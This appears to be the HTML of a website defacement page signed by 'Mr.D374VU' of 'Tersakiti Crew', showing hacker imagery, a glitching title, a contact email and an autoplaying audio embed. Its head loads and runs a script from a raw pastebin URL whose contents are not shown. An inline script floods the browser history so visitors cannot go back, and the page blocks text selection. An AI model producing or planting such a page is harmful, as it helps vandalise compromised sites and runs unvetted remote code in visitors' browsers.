
<html>

<head>

<link rel="icon" type="image/png" href="https://images.ctfassets.net/m868ks80jg7q/4uN6uDEWTvb5Bd4TLSsoEX/87264eddd6ef6e24d4119a4288044f28/cc-deja-vu.jpg?w=690&h=480&fm=webp&fit=fill&q=75" type="image/x-icon"/>

<title>Touch By Mr.D374VU</title>

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> 

<meta name="google-site-verification" content="Mr.D374VU"/>

<meta name="theme-color" content="black">

<meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/>

<meta name="description" content="Tersakiti Crew">

<meta name="author" content="Mr.D374VU, Tersakiti Crew"/>

<meta name="keywords" content="Mr.D374VU, Tersakiti Crew"/>

<meta name="googlebot" content="all"/>

<meta name="robots" content="all" />

<meta name="googlebot-news" content="all" />

<meta name="google" content="notranslate"/>

<meta name="og:title" content="Touch By Mr.D374VU"/>

<meta property="og:image" content="https://www.deviantart.com/junguler/art/Dedsec-2-0-generic-hacker-614821401" />

<meta property="og:type" content="website" />

<meta property="og:updated_time" content="1440432930" />

</span>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"></script>

</head>

<style type="text/css">

  /* Copyright Tersakiti Crew */

@import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap");

body{

     overflow:hidden;

     display: flex;

     align-items: center;

     justify-content: center;

     margin:0;

     padding:0;

     width:100%;

     background-color:black;

     }

i{

margin:10px;

color: red;

}

a:link{

color:#000;

}

h1{

  color: #000;

  text-decoration: none;

  border-radius:0px;

  border:0px;

  font-family: 'Shadows Into Light', cursive;

  font-size:50px;

  margin:0px;

  padding:0px;

  animation:psychoxploit 0.5s linear infinite;

}

pre{

color:grey;

}

marquee{

width:100%;

}

@keyframes psychoxploit{

2%{color:#fff;}

3%{transform:translate(2px,-10px) skewX(3240deg);}

5%{transform:translate(0px,0px) skewX(0deg);}

2% , 54%{transform:translateX(0px) skew(0deg);}

55%{transform:translate(-2px,6px) skew(-5530deg);}

56%{transform:translate(0px,0px) skew(0deg);}

57%{transform:translate(4px,-10px) skew(-70deg);}

58%{transform:translate(0px,0px) skew(0deg);}

62%{transform:translate(0px,20px) skew(0deg);}

63%{transform:translate(4px,-2px) skew(0deg);}

90%{transform:translate(1px,3px); skew(-230deg);}

95%{transform:translate(-7px,2px); skew(-120deg);}

100%{transform:translate(0px,0px) skew(0deg);}

</style>

<body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">

<embed src="https://youtu.be/hA8tHUXHotw" type="audio/mpeg" autostart="true" loop="true" height="10" width="10">

<script>

(function () {

for(var i = 0; i < 20; i++) {

history.pushState(null, document.title, window.location.href );

}

})(document, window, history);

</script>

<center>

<img title="Touchead by Mr.D374VU" class="picture" src="https://www.deviantart.com/junguler/art/Dedsec-2-0-generic-hacker-614821401" width="183px" height="275px"/>

<br><h1><font color="red">Touch By</font> Mr.D374VU</h1><br>

<pre> # <font color="red">T</font>ersakiti~<font color="red">C</font>rew<br>

 Sorry :( </pre><br>

<marquee direction="scroll"><pre>Thank's Allah - <i>Mr.D374Vu</i> - Contacts Me with Email mr.d374vuid@mail.com</pre></marquee><br>

</center>

</body>

</html>

